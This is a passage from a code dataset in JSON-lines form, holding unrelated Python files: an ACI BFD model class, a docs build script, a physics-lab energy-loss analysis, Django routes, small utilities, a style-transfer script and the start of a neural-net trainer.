PropCategory.REGULAR)\n prop.label = \"Remote MAC Address\"\n prop.isOper = True\n meta.props.add(\"remoteMac\", prop)\n\n prop = PropMeta(\"str\", \"remoteOperSt\", \"remoteOperSt\", 17023, PropCategory.REGULAR)\n prop.label = \"Remote Oper State\"\n prop.isOper = True\n prop._addConstant(\"admin-down\", \"admindown\", 0)\n prop._addConstant(\"down\", \"down\", 1)\n prop._addConstant(\"init\", \"init\", 2)\n prop._addConstant(\"up\", \"up\", 3)\n meta.props.add(\"remoteOperSt\", prop)\n\n prop = PropMeta(\"str\", \"rn\", \"rn\", 2, PropCategory.RN)\n prop.label = \"None\"\n prop.isRn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"rn\", prop)\n\n prop = PropMeta(\"str\", \"rxIntvl\", \"rxIntvl\", 17017, PropCategory.REGULAR)\n prop.label = \"Active Value of Rx Interval\"\n prop.isOper = True\n prop.range = [(50, 999)]\n prop.defaultValue = 50\n prop.defaultValueStr = \"50\"\n meta.props.add(\"rxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"slowIntvl\", \"slowIntvl\", 17018, PropCategory.REGULAR)\n prop.label = \"Active value of Slow Interval\"\n prop.isOper = True\n prop.range = [(1000, 30000)]\n prop.defaultValue = 2000\n prop.defaultValueStr = \"2000\"\n meta.props.add(\"slowIntvl\", prop)\n\n prop = PropMeta(\"str\", \"srcAddr\", \"srcAddr\", 17010, PropCategory.REGULAR)\n prop.label = \"Source IP Address\"\n prop.isOper = True\n meta.props.add(\"srcAddr\", prop)\n\n prop = PropMeta(\"str\", \"status\", \"status\", 3, PropCategory.STATUS)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"created\", \"created\", 2)\n prop._addConstant(\"deleted\", \"deleted\", 8)\n prop._addConstant(\"modified\", \"modified\", 4)\n meta.props.add(\"status\", prop)\n\n prop = PropMeta(\"str\", \"txIntvl\", \"txIntvl\", 17015, PropCategory.REGULAR)\n prop.label = \"Active Value of Tx Interval\"\n prop.isOper = True\n prop.range = [(50, 999)]\n prop.defaultValue = 50\n prop.defaultValueStr = \"50\"\n meta.props.add(\"txIntvl\", prop)\n\n prop = PropMeta(\"str\", \"vrfName\", \"vrfName\", 17009, PropCategory.REGULAR)\n prop.label = \"L3 Context Name\"\n prop.isOper = True\n prop.range = [(0, 512)]\n meta.props.add(\"vrfName\", prop)\n\n meta.namingProps.append(getattr(meta.props, \"discr\"))\n\n def __init__(self, parentMoOrDn, discr, markDirty=True, **creationProps):\n namingVals = [discr]\n Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)\n\n\n\n# End of package file\n# ##################################################\n","sub_path":"venv/Lib/site-packages/cobra/modelimpl/bfd/sess.py","file_name":"sess.py","file_ext":"py","file_size_in_byte":13338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"130913395","text":"import string\n\ns = list(map(str, input()))\ns = list(set(s))\ns.sort()\n\nans = \"\"\narr = []\n\nalp = list(map(str, string.ascii_lowercase))\nfor char in s:\n alp.remove(char)\n\nif len(alp) == 0:\n print(\"None\")\nelse:\n print(alp[0])\n","sub_path":"Python_codes/p03624/s647570177.py","file_name":"s647570177.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"524402602","text":"###############################################################################\n##\n## Copyright (C) 2014 Tavendo GmbH\n##\n## Licensed under the Apache License, Version 2.0 (the \"License\");\n## you may not use this file except in compliance with the License.\n## You may obtain a copy of the License at\n##\n## http://www.apache.org/licenses/LICENSE-2.0\n##\n## Unless required by applicable law or agreed to in writing, software\n## distributed under the License is distributed on an \"AS IS\" BASIS,\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n## See the License for the specific language governing permissions and\n## limitations under the License.\n##\n###############################################################################\n\nimport os\nimport json\nimport pkg_resources\n\ntaschenmesser = pkg_resources.resource_filename('taschenmesser', '..')\n#taschenmesser = \"../../../infrequent/taschenmesser\"\nenv = Environment(tools = ['default', 'taschenmesser'],\n toolpath = [taschenmesser],\n ENV = os.environ)\n\n\n##\n## Sphinx Build\n##\nsphinx_docs = env.Command('_build', [], \"sphinx-build -b html . $TARGET\")\nenv.AlwaysBuild(sphinx_docs)\nClean(sphinx_docs, '_build')\n\nuploaded_sphinx = env.s3_dir_uploader('_upload1', '_build', 'autobahn.ws', 'cpp')\nDepends(uploaded_sphinx, sphinx_docs)\n\n\n\n##\n## Doxygen Build\n##\ndoxygen_docs = env.Command('_doxygen', [], \"doxygen Doxyfile\")\nenv.AlwaysBuild(doxygen_docs)\nClean(doxygen_docs, '_doxygen')\n\nuploaded_doxygen = env.s3_dir_uploader('_upload2', '_doxygen/html', 'autobahn.ws', 'cpp/reference')\nDepends(uploaded_doxygen, doxygen_docs)\n\n\n##\n## Targets\n##\nDefault([sphinx_docs, doxygen_docs])\nAlias('upload', [uploaded_sphinx, uploaded_doxygen])\n","sub_path":"doc/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"450902831","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import sem\nfrom uncertainties import ufloat\nfrom uncertainties.unumpy import (nominal_values as noms, std_devs as stds)\nfrom scipy import optimize\nimport uncertainties.unumpy as unp\nimport scipy.constants as const\n\nE_ohne = 5.48556e6 # in MeV siehe altprotokoll\n# ohne Folie\np, ampmax, ampmin = np.genfromtxt('data/messung_c_ohne_folie.csv', delimiter=',', unpack=True)\namp = (ampmax+ampmin)/2\nfamp = np.ones(len(amp))\nfor i in range(len(amp)):\n famp[i] = sem([ampmax[i], ampmin[i]])\n# mit Folie\npf, ampmaxf, ampminf = np.genfromtxt('data/messung_c_gold2mikrometer.csv', delimiter=',', unpack=True)\nampf = (ampmaxf+ampminf)/2\nfampf = np.ones(len(ampf))\nfor i in range(len(ampf)):\n fampf[i] = sem([ampmaxf[i], ampminf[i]])\n\ndef func(x, m, b):\n return m*x+b\n\n# ohne Folie\nprint('========= Ohne Folie =========')\nparams, covariance_matrix = optimize.curve_fit(func, p, amp, sigma=famp, absolute_sigma=True)\nerrors = np.sqrt(np.diag(covariance_matrix))\n\nparam0 = ufloat(params[0], errors[0])\nprint('param0', param0)\nn0 = f'{noms(param0):1.4f}'\ns0 = f'{stds(param0):1.4f}'\ns0 = s0[4:6]\nprint('n0, s0')\nprint(n0, s0)\nwith open('build/energieverlust-ohne-folie-m.tex', 'w') as file:\n file.write(r'm_\\text{ohne} &= \\SI{')\n file.write(f'{n0}({s0})')\n file.write(r'}{\\volt\\per\\milli\\bar}')\n\nparam1 = ufloat(params[1], errors[1])\nprint('param1', param1)\nn1 = f'{noms(param1):1.2f}'\ns1 = f'{stds(param1):1.2f}'\ns1 = s1[2:5]\nprint('n1, s1 = b_ohne')\nprint(n1, s1)\nwith open('build/energieverlust-ohne-folie-b.tex', 'w') as file:\n file.write(r'b_\\text{ohne} &= \\SI{')\n file.write(f'{n1}({s1})')\n file.write(r'}{\\volt}')\n\n# mit Folie\nprint('========= Mit Folie =========')\nparamsf, covariance_matrixf = optimize.curve_fit(func, pf, ampf, sigma=fampf, absolute_sigma=True)\nerrorsf = np.sqrt(np.diag(covariance_matrixf))\n\nparam0f = ufloat(paramsf[0], errorsf[0])\nprint('param0f', param0f)\nn0f = f'{noms(param0f):1.3f}'\ns0f = f'{stds(param0f):1.3f}'\ns0f = s0f[-1]\nprint('n0f, s0f')\nprint(n0f, s0f)\nwith open('build/energieverlust-mit-folie-m.tex', 'w') as file:\n file.write(r'm_\\text{mit} &= \\SI{')\n file.write(f'{n0f}({s0f})')\n file.write(r'}{\\volt\\per\\milli\\bar}')\n\nparam1f = ufloat(paramsf[1], errorsf[1])\nprint('param1f', param1f)\nn1f = f'{noms(param1f):1.2f}'\ns1f = f'{stds(param1f):1.2f}'\ns1f = s1f[2:4]\nprint('n1f, s1f = b_mit')\nprint(n1f, s1f)\nwith open('build/energieverlust-mit-folie-b.tex', 'w') as file:\n file.write(r'b_\\text{mit} &= \\SI{')\n file.write(f'{n1f}({s1f})')\n file.write(r'}{\\volt}')\n\n# weitere Rechnungen\nprint('========= Geschwindigkeit =========')\ndeltaE = E_ohne*(1 - (param1f / param1))\nE_mit = E_ohne*(param1f / param1)\nprint(\"E_mit: \", E_mit)\nprint('ΔE', deltaE)\nndE = f'{noms(deltaE):7.0f}'\nsdE = f'{stds(deltaE):6.0f}'\n#sdE = sdE[-1]\nprint('ndE, sdE')\nprint(ndE, sdE)\nwith open('build/energieverlust-delta-e.tex', 'w') as file:\n file.write(r'\\laplace E &= \\SI{1.6(3)e6}{\\electronvolt}')\nmalpha = const.value(u'alpha particle mass energy equivalent in MeV')\nmalpha *= 10**6\nprint('malpha', malpha)\nv = unp.sqrt(E_ohne/malpha * (1 + (param1f/ param1)))\nprint('v', v)\nnv = f'{noms(v):1.4f}'\nsv = f'{stds(v):1.4f}'[-1]\nprint('nv, sv')\nprint(nv, sv)\nwith open('build/energieverlust-v.tex', 'w') as file:\n file.write(r'v_α &= (\\num{')\n file.write(f'{nv}({sv})')\n file.write(r'})\\symup{c}')\nv *= const.speed_of_light\nprint('v', v)\nwith open('build/energieverlust-c.tex', 'w') as file:\n file.write(r'v_α &= \\SI{1.506(24)e7}{\\meter\\per\\second}')\n# oben\nprint('========= Bethe-Bloch =========')\nu = const.value(u'atomic mass constant')\nion = 1.265719530432*10**(-16) # joule\nrho = 19.3*10**3 #kg/m**3\nZ_Au = 79\nA = 197\n# N_Au = (Z_Au*rho) / (A*u)\noben = deltaE*const.m_e*(v**2)*4*const.pi*const.epsilon_0**2*A*u\nunten = 4*const.e**4*Z_Au*rho*unp.log((2*const.m_e*(v**2))/(ion))*6.242e18\nprint('oben', oben)\nprint('unten', unten)\ndeltax = oben/unten\nprint('Δx', deltax)\nprint('E_mit/deltax', E_mit/deltax)\nwith open('build/energieverlust-deltax.tex', 'w') as file:\n file.write(r'\\laplace x &= \\SI{')\n file.write(r'3.5(7)e-6')\n file.write(r'}{\\meter}')\nwith open('build/energieverlust-konstanten.tex', 'w') as file:\n # ΔE\n file.write(r'\\laplace E &= \\SI{1.56(17)e6}{\\electronvolt} \\\\')\n file.write('\\n')\n # m_e\n file.write(r'm_\\text{e} &= \\SI{')\n file.write(f'{const.m_e}')\n file.write(r'}{\\kilo\\gram} \\\\')\n file.write('\\n')\n # epsilon_0\n file.write(r'ε_0 &= \\SI{')\n file.write(f'{const.epsilon_0}')\n file.write(r'}{\\ampere\\second\\per\\volt\\per\\meter} \\\\')\n file.write('\\n')\n # A\n file.write(r'A &= \\num{197} \\\\')\n file.write('\\n')\n # u\n file.write(r'u &= \\SI{')\n file.write(f'{u}')\n file.write(r'}{\\kilo\\gram} \\\\')\n file.write('\\n')\n # z\n file.write(r'z &= \\num{2} \\\\')\n file.write('\\n')\n # e\n file.write(r'\\symup{e} &= \\SI{')\n file.write(f'{const.e}')\n file.write(r'}{\\coulomb} \\\\')\n file.write('\\n')\n # Z\n file.write(r'Z &= \\num{79} \\\\')\n file.write('\\n')\n # ρ\n file.write(r'\\rho &= \\SI{19.3e3}{\\kilo\\gram\\per\\cubic\\meter} \\\\')\n file.write('\\n')\n # I\n file.write(r'I &= \\SI{')\n file.write(f'{ion}')\n file.write(r'}{\\joule}')\n file.write('\\n')\n\n# Plots\npx = np.linspace(0.02, 300)\nplt.plot(px, func(px, *params), 'r-', label='Ausgleichsgerade ohne Folie')\nplt.errorbar(p, amp, yerr=famp, fmt='bx', label='Messwerte ohne Folie', linewidth=1)\nplt.plot(px, func(px, *paramsf), 'k-', label='Ausgleichsgerade mit Folie')\nplt.errorbar(pf, ampf, yerr=fampf, fmt='gx', label=r'Messwerte mit $\\SI{2}{\\micro\\meter}$ Goldfolie', elinewidth=1)\nplt.grid()\nplt.legend()\nplt.xscale('log')\nplt.xlim(0.02, 300)\nplt.ylim(0.6, 4.7)\nplt.xlabel(r'$p\\:/\\:\\si{\\milli\\bar}$')\nplt.ylabel(r'$U\\:/\\:\\si{\\volt}$')\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\nplt.savefig('build/energieverlust.pdf')\nplt.clf()\n\nplt.plot(px, func(px, *params), 'r-', label='Ausgleichsgerade ohne Folie')\nplt.errorbar(p, amp, yerr=famp, fmt='bx', label='Messwerte ohne Folie', linewidth=1)\nplt.plot(px, func(px, *paramsf), 'k-', label='Ausgleichsgerade mit Folie')\nplt.errorbar(pf, ampf, yerr=fampf, fmt='gx', label=r'Messwerte mit $\\SI{2}{\\micro\\meter}$ Goldfolie', elinewidth=1)\nplt.grid()\nplt.legend()\nplt.xlim(0.02, 300)\nplt.ylim(0.6, 4.7)\nplt.xlabel(r'$p\\:/\\:\\si{\\milli\\bar}$')\nplt.ylabel(r'$U\\:/\\:\\si{\\volt}$')\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\nplt.savefig('build/energieverlust_linear.pdf')\nplt.clf()\n\nnp.savetxt('build/energieverlust-ohne-folie.csv',\n np.column_stack([p, ampmax, ampmin, amp, famp]),\n delimiter='&', fmt='%3.2f, %1.2f, %1.2f, %1.2f, %0.2f',\n header='p, ampmax, ampmin, amp, famp')\nnp.savetxt('build/energieverlust-mit-folie.csv',\n np.column_stack([pf, ampmaxf, ampminf, ampf, fampf]),\n delimiter='&', fmt='%3.2f, %1.3f, %1.3f, %1.3f, %0.3f',\n header='pf, ampmaxf, ampminf, ampf, fampf')\n\n# bethe bloch in luft:\nAluft = 14 # fuer stickstoff\nzluft = 2\nZ_luft = 7\nE = E_ohne\nv_luft = unp.sqrt(2*E/malpha)*const.speed_of_light\nrho_luft = 1.2041 # bei 25 grad celsius\nI_luft = 10*7*const.e\nzaehler = deltaE*const.m_e*(v_luft**2)*4*np.pi*const.epsilon_0**2*Aluft*u\nnenner = zluft**2*const.e**4*Z_luft*rho_luft*unp.log((2*const.m_e*(v_luft**2))/(I_luft))*6.242e18\ndeltax_L = zaehler / nenner\nprint('E_mit/deltax_L', E_mit/deltax_L, '\\n')\nprint(\"ALuft: \", Aluft)\nprint(\"zluft: \", zluft)\nprint(\"v alpha, luft: \", v_luft)\nprint(\"rho_luft: \", rho_luft)\nprint(\"ZLuft: \", Z_luft)\nprint(\"Ion_luft\", I_luft)\nprint(\"zaehler: \", zaehler)\nprint(\"nenner; \", nenner)\nprint(\"deltax L: \", deltax_L)\n","sub_path":"v16-rutherford/python-skripts/energieverlust.py","file_name":"energieverlust.py","file_ext":"py","file_size_in_byte":7660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"426589025","text":"\"\"\"config URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom .views import PhotoCreate, PhotoDelete, PhotoDetail, PhotoList, PhotoUpdate, PhotoLike, PhotoFavorite\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\napp_name = 'photo'\n\nurlpatterns = [\n path(\"create/\", PhotoCreate.as_view(), name = 'create'),\n path(\"like/\", PhotoLike.as_view(), name = 'like'),\n path(\"favorite/\", PhotoFavorite.as_view(), name = 'favorite'),\n path(\"update//\", PhotoUpdate.as_view(), name = 'update'),\n path(\"delete//\", PhotoDelete.as_view(), name = 'delete'),\n path(\"detail//\", PhotoDetail.as_view(), name = 'detail'),\n path(\"\", PhotoList.as_view(), name = 'index'),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","sub_path":"photo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"32908599","text":"#Stephen Barton Jr\r\n#Python Programming, tax report\r\n#22 APR 2019\r\n\r\ndef main():\r\n tsales = float(input(\"Enter the total sales for the month: \"))\r\n tax(tsales)\r\n\r\ndef tax(tsales):\r\n county = tsales * .02\r\n state = tsales * .04\r\n print(\"The county tax is: \",format(county, '.2f'))\r\n print(\"The state tax is: \",format(state, '.2f'))\r\n totaltax = county + state\r\n print(\"The total sales tax is: \",format(totaltax, '.2f'))\r\n\r\nmain()\r\n","sub_path":"Python/functions/taxreport.py","file_name":"taxreport.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"652573961","text":"from data import Scenario1, Scenario2\nfrom classes.scenario import Scenario\nfrom classes.action_cli import ActionCLI\nfrom classes.action_http import ActionHTTP\n\nclass Bot(object):\n\n START_BOT = 'Bot> %s'\n\n \"\"\" Class for the Bot will initiate scenarii\"\"\"\n\n def __init__(self, mode='cli'):\n self.first_input = input('Me> ')\n self.mode = mode\n self.inputs = []\n #select the mode of answers\n if mode == 'http':\n self.object_mode = ActionHTTP()\n else:\n self.object_mode = ActionCLI()\n self.intention_detector()\n\n def intention_detector(self):\n '''\n check the first input of the user and choose the right scenario\n OR use _fallback\n '''\n if 'hello' in self.first_input.lower():\n Scenario(self, Scenario1)\n elif 'hi' in self.first_input.lower():\n Scenario(self, Scenario2)\n else:\n self._fallback()\n\n def get_new_message(self):\n '''\n ask new input to the user\n '''\n new_input = input('Me>')\n self.inputs.append(new_input)\n return new_input\n\n def _fallback(self):\n print('Sorry')\n\n def action_switcher(self, type, data):\n '''\n choose which type of action for answer\n '''\n {\n 'text': self.object_mode.output_message,\n 'image': self.object_mode.output_image\n }.get(type)(data)\n","sub_path":"classes/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"435143514","text":"import base64\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom io import BytesIO\n\nfrom PIL import Image\nimport torchvision.transforms as transforms\nimport torchvision.models as models\n\nimport copy\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu') # use cuda if it is available\nimsize = 512 if torch.cuda.is_available() else 128 # choose image size based on cuda availability\n\nprint(f\"device ------------ {device}\")\n\ncnn = models.vgg19(pretrained=True).features.to(device).eval()\ncnn_normalization_mean = torch.tensor([0.485, 0.456, 0.406]).to(device)\ncnn_normalization_std = torch.tensor([0.229, 0.224, 0.225]).to(device)\n\nclass ContentLoss(nn.Module):\n '''content loss class'''\n def __init__(self, target,):\n super(ContentLoss, self).__init__()\n self.target = target.detach()\n\n def forward(self, input):\n self.loss = F.mse_loss(input, self.target)\n return input\n\ndef gram_matrix(input):\n # computes gram matrix\n a, b, c, d = input.size()\n features = input.view(a * b, c * d)\n\n G = torch.mm(features, features.t())\n return G.div(a * b * c * d)\n\nclass StyleLoss(nn.Module):\n '''style loss class'''\n def __init__(self, target_feature):\n super(StyleLoss, self).__init__()\n self.target = gram_matrix(target_feature).detach()\n\n def forward(self, input):\n G = gram_matrix(input)\n self.loss = F.mse_loss(G, self.target)\n return input\n\nclass NormalizationLayer(nn.Module):\n '''normalization class'''\n\n def __init__(self, mean, std):\n super(NormalizationLayer, self).__init__()\n self.mean = torch.tensor(mean).view(-1, 1, 1)\n self.std = torch.tensor(std).view(-1, 1, 1)\n\n def forward(self, img):\n return (img - self.mean) / self.std\n\ndef load_image(img, maxsize=None, shape=None):\n # load image with maxsize or fixed size\n image = Image.open(BytesIO(img))\n image = image.convert('RGB')\n if maxsize:\n loader = transforms.Compose([\n transforms.Resize(maxsize),\n transforms.ToTensor()])\n elif shape:\n loader = transforms.Compose([\n transforms.Resize(shape),\n transforms.ToTensor()])\n image = loader(image).unsqueeze(0)\n return image.to(device, torch.float)\n\ndef get_style_model_and_losses(cnn, mean, std, style_img, content_img):\n '''Get model, style and content losses'''\n content_layers = ['conv_4']\n style_layers = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']\n\n cnn = copy.deepcopy(cnn)\n\n normalization = NormalizationLayer(mean, std).to(device)\n\n content_losses = []\n style_losses = []\n\n model = nn.Sequential(normalization)\n\n conv_ind = 0\n for name, layer in cnn._modules.items():\n if isinstance(layer, nn.Conv2d):\n conv_ind += 1\n name = f'conv_{conv_ind}'\n elif isinstance(layer, nn.ReLU):\n layer = nn.ReLU(inplace=False)\n\n model.add_module(name, layer)\n\n if name in content_layers:\n target = model(content_img).detach()\n content_loss = ContentLoss(target)\n model.add_module(f\"content_loss_{conv_ind}\", content_loss)\n content_losses.append(content_loss)\n\n if name in style_layers:\n target_feature = model(style_img).detach()\n style_loss = StyleLoss(target_feature)\n model.add_module(f\"style_loss_{conv_ind}\", style_loss)\n style_losses.append(style_loss)\n \n model = model[:18]\n\n return model, style_losses, content_losses\n\ndef run_style_transfer(cnn, mean, std,content_img, style_img, input_img):\n print('Training...')\n style_weight = 1000000\n content_weight = 1\n num_steps = 300\n model, style_losses, content_losses = get_style_model_and_losses(cnn, mean, std, style_img, content_img)\n optimizer = optim.LBFGS([input_img.requires_grad_()])\n iter = 0\n while iter <= num_steps:\n def closure():\n nonlocal iter\n input_img.data.clamp_(0, 1)\n\n optimizer.zero_grad()\n model(input_img)\n style_score = 0\n content_score = 0\n\n for sl in style_losses:\n style_score += sl.loss\n for cl in content_losses:\n content_score += cl.loss\n\n style_score *= style_weight\n content_score *= content_weight\n\n loss = style_score + content_score\n loss.backward()\n\n iter += 1\n if iter % 50 == 0:\n print(f\"Iter {iter}:\")\n print('Style Loss : {:4f} Content Loss: {:4f}'.format(style_score.item(), content_score.item()))\n print()\n\n\n return style_score + content_score\n\n optimizer.step(closure)\n \n input_img.data.clamp_(0, 1)\n\n return input_img\n\ndef NST(style_img, content_img):\n content_img = load_image(content_img, maxsize=imsize)\n style_img = load_image(style_img,shape=(content_img.size(2), content_img.size(3)))\n \n # load style and content images\n print(style_img.size(), content_img.size())\n assert style_img.size() == content_img.size(), \"we need to import style and content images of the same size\"\n input_img = content_img.clone()\n image = run_style_transfer(cnn, cnn_normalization_mean, cnn_normalization_std, content_img, style_img, input_img)\n\n\n unloader = transforms.ToPILImage() # convert into PIL image\n image = image.cpu().clone()\n image = image.squeeze(0) # remove extra dimension\n image = unloader(image)\n\n # decode image to base64 string\n buffered = BytesIO()\n image.save(buffered, format=\"JPEG\")\n img_str = base64.b64encode(buffered.getvalue())\n \n # create result json\n result = {}\n result[\"image\"] = 'data:image/jpeg;base64,' + img_str.decode('utf-8')\n return result","sub_path":"nst.py","file_name":"nst.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"450399886","text":"import pandas as pd\r\nimport datetime as dt\r\nimport yfinance as yf\r\nimport streamlit as st\r\n\r\nclass DashTools():\r\n \r\n def __init__(self):\r\n \r\n #we have to make dataframe by hand becuase everything will run from github so no directory \r\n self.weights = pd.read_excel(\"holdings.xlsx\", index_col = 0)\r\n \r\n #get tickers\r\n self.tickers = sorted(list(self.weights.index))\r\n \r\n #turns this into a pd.series with tickers as index and number of shares as value\r\n self.share_count = self.weights['share_count']\r\n \r\n #grab todays date\r\n self.end_date = dt.datetime.today()\r\n \r\n #the cost basis day provided from LITG\r\n self.start_date = dt.datetime(2019,2,19)\r\n \r\n #get update time\r\n self.update_date = self.end_date.strftime(\"%a %D %I:%M %p\") \r\n \r\n #get daily_prices\r\n self.daily_prices = yf.download(self.tickers, self.start_date, self.end_date)['Close'].dropna()\r\n \r\n #this will make a dataframe with all of the columns being the value of the stock and the last columnn will be the value of the fund\r\n #becasue it takes a lot of work to make this dataframe create a function for defining the variable\r\n self.daily_portfolio = self.make_daily_portfolio()\r\n \r\n #this function will make the portfolio\r\n def make_daily_portfolio(self):\r\n \r\n #iniitalize a dataframe \r\n daily_portfolio = pd.DataFrame(columns = self.tickers, index = self.daily_prices.index)\r\n \r\n #the goal here is to multiply all of the cells which are prices by the number of shares\r\n \r\n #we are going to go through each column at a time\r\n for i in self.tickers:\r\n \r\n #grab the number of shares\r\n share_count = self.share_count[i]\r\n \r\n #now go through the price of the stock for each day\r\n for j in range(len(self.daily_prices[i])):\r\n \r\n #get the price of the stock\r\n price = self.daily_prices[i][j]\r\n \r\n #multiply the price of the stock by the number of shares and put that into the daily_portfolio\r\n daily_portfolio[i][j] = round(price * share_count,2)\r\n \r\n #this will sum of the value of each stock to get a final portfolio value\r\n daily_portfolio[\"value\"] = daily_portfolio.sum(axis = 1)\r\n \r\n #now output that back out \r\n return daily_portfolio\r\n \r\n def make_monthly_portfolio(self):\r\n \r\n #get monthly prices\r\n monthly_prices = yf.download(self.tickers, self.start_date, self.end_date, interval = \"1mo\")['Close'].dropna()\r\n \r\n #we want to make a monthly_portfolio that is empty but with the same index and column as our monthly prices\r\n monthly_portfolio = pd.DataFrame(columns = self.tickers, index = monthly_prices.index)\r\n \r\n #we want to through each stock\r\n for i in self.tickers:\r\n \r\n #we want to get our allocation size\r\n share_count = self.share_count[i]\r\n \r\n #we want to loop through the prices of the stock\r\n for j in monthly_prices.index:\r\n \r\n #get the price\r\n price = monthly_prices[i][j]\r\n \r\n #multiply prices by number of shares\r\n monthly_portfolio[i][j] = share_count * price\r\n \r\n return monthly_portfolio\r\n \r\n \r\n \r\n ","sub_path":"dash_beta/dash_tools.py","file_name":"dash_tools.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"269222729","text":"#Cristian Camilo Benitez\nfrom math import*\n\n# Defining Function\ndef f(x): \n return sin(x)+1 \n\n# Implementing Secant Method\n\ndef secant(x0,x1,e,N):\n print('\\n\\n*** Metodo de la secante ***')\n step = 1\n condition = True\n while condition:\n if f(x0) == f(x1):\n print('Divide by zero error!')\n break\n \n x2 = x0 - (x1-x0)*f(x0)/( f(x1) - f(x0) ) \n print('Iteracion-%d, x2 = %0.6f y f(x2) = %0.6f' % (step, x2, f(x2)))\n x0 = x1\n x1 = x2\n step = step + 1\n \n if step > N:\n print('No Convergente!')\n break\n \n condition = abs(f(x2)) > e\n print('\\n Raiz aprox.: %0.8f' % x2)\n\n\nx0 = input('Primer valor: ')\nx1 = input('Segundo valor: ')\nN = input('Max iteraciones: ')\n\nx0 = float(x0)\nx1 = float(x1)\ne = 10**-16\n\nN = int(N)\n\n\n# Starting Secant Method\nsecant(x0,x1,e,N)","sub_path":"Parciales/Corte 1/punto 1-CristianBenitez.py","file_name":"punto 1-CristianBenitez.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"531811286","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 1 10:37:26 2020\n\n@author: yinz\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nclass training():\n def __init__(self,inputs,labels,midlayer_size,output_size,learning_rate,iteration,):\n #np.random.seed(0)\n\n self.inputs = inputs \n self.labels = labels \n self.weight_hide = np.random.randn(inputs.shape[1], midlayer_size) \n self.weight_out = np.random.randn(midlayer_size,output_size)\n\n self.learning_rate = learning_rate\n self.threshold_hide = np.random.rand(midlayer_size)\n self.threshold_out = np.random.rand(output_size)\n min_val = -2.4/inputs.shape[1]\n max_val = 2.4/inputs.shape[1]\n \n self.threshold_hide = min_val + (self.threshold_hide *(max_val - min_val))\n self.threshold_out = min_val + (self.threshold_out *(max_val - min_val))\n\n self.iteration = iteration\n\n def sigmod(self,x):\n return 1/(1+np.exp(-x))\n \n def sigmoid_prime(self,x):\n return (x)*(1.0-x)\n\n def feedforward(self):\n\n self.midlayer = self.sigmod(np.dot(self.inputs,self.weight_hide) - self.threshold_hide)\n # print (\"midlayer\",self.midlayer.shape)\n self.outputlayer = self.sigmod(np.dot(self.midlayer,self.weight_out )- self.threshold_out) \n # print (\"outputlayer\",self.outputlayer.shape)\n \n \n def weight(self):\n \n error_out = (self.labels - self.outputlayer) * self.sigmoid_prime(self.outputlayer) \n # print (\"error_out\",error_out.shape)\n \n gradient_descent_output = np.dot(self.midlayer.T,error_out) \n # print (\"gradient_descent_output\",gradient_descent_output.shape)\n delta_weight_out = np.dot(self.learning_rate,gradient_descent_output) \n # print (\"delta_weight_out\",delta_weight_out.shape)\n #delta_threashold_out = np.dot(self.learning_rate,np.dot(self.threshold_out.T,error_out)) \n # print (\"delta_threashold_out\",delta_threashold_out.shape)\n \n error_hide = np.dot(error_out,self.weight_out.T) * (self.sigmoid_prime(self.midlayer))\n # error_hide = np.dot(self.sigmoid_prime(self.midlayer),np.dot(self.weight_out,error_out)) \n # print (\"error_hide\",error_hide.shape)\n gradient_descent_hide = np.dot(self.inputs.T,error_hide) \n \n # print (\"gradient_descent_hide\",gradient_descent_hide.shape)\n delta_weight_hide = np.dot(self.learning_rate,gradient_descent_hide)\n # print (\"delta_weight_hide\",delta_weight_hide.shape)\n \n #delta_threashold_hide = 